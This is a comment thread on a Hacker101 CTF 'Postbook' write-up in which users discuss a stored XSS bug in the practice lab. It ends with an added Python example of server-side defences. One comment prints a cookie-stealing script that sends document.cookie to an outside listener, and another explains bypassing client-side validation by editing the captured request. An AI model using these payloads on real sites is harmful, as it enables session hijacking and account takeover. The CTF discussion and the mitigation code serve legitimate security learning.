DEV Community

Discussion on: Hacker101 CTF - Postbook

Adam Dry • Edited

Hey! I found an XSS bug that didn't lead to a flag. I created a user with a username of <script>alert('xss!')</script> and then created a post by that user.

This meant that when logging in as that user - or indeed another user - the JS was executed in the context of the logged-in user. But there was no flag associated with it!

Do you think that's a real bug or is there something I'm missing? I've completed all 7 flags now and none of them seem to relate to XSS :/

DaNeil C

Well, being that these CTFs are for learning and there are specific hints aimed towards the flags, I'd say that it's just a happy easter egg that you found. Go you!👍

Souvik Kar Mahapatra

Yeah, even I found that, and I used it to steal the cookie using: <script>fetch('http://localhost:8080/?'+document.cookie)</script> and easily logged into other accounts without a username or password; however, no flags found ;-;

Pushkar Jain

Nice finding, brother. However, they have patched the same now, so the username can only contain lowercase letters. But they are still using client-side validation, so if you can capture the request, you can still perform stored XSS.
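
Added example, not part of the comments above and not Postbook's own code: the three server-side controls that close the gap this thread describes, namely an allowlist check on the username that does not depend on the browser, HTML encoding when the name is rendered, and an HttpOnly session cookie so `document.cookie` cannot read it. The function names, the 1-32 length bound and the cookie name `session` are assumptions made for illustration.

```python
import html
import re
from http.cookies import SimpleCookie

# Server-side allowlist: lowercase letters only, matching the rule the thread
# says the form now enforces in the browser. The length bound is an assumption.
USERNAME_RE = re.compile(r"[a-z]{1,32}")


def validate_username(raw):
    """Return the username if it passes the allowlist, else raise ValueError."""
    # fullmatch() is used instead of match() with "$", which would accept "adam\n".
    if not isinstance(raw, str) or USERNAME_RE.fullmatch(raw) is None:
        raise ValueError("username must be 1-32 lowercase letters")
    return raw


def render_post(author, body):
    """Encode on output so stored markup is shown as text, never parsed as HTML."""
    return '<div class="post"><b>{}</b>: {}</div>'.format(
        html.escape(author, quote=True), html.escape(body, quote=True))


def session_cookie(session_id):
    """Build a Set-Cookie value that page scripts cannot read via document.cookie."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


if __name__ == "__main__":
    # Constructed inputs: values a request body can carry when only the browser checks them.
    for candidate in ["adam", "<script>alert('xss!')</script>", "Adam", "adam\n"]:
        try:
            print("accepted:", validate_username(candidate))
        except ValueError as exc:
            print("rejected:", repr(candidate), "-", exc)
    # Defence in depth: even a name stored before the patch renders inert.
    print(render_post("<script>alert('xss!')</script>", "hello"))
    print("Set-Cookie:", session_cookie("constructed-session-id"))
```
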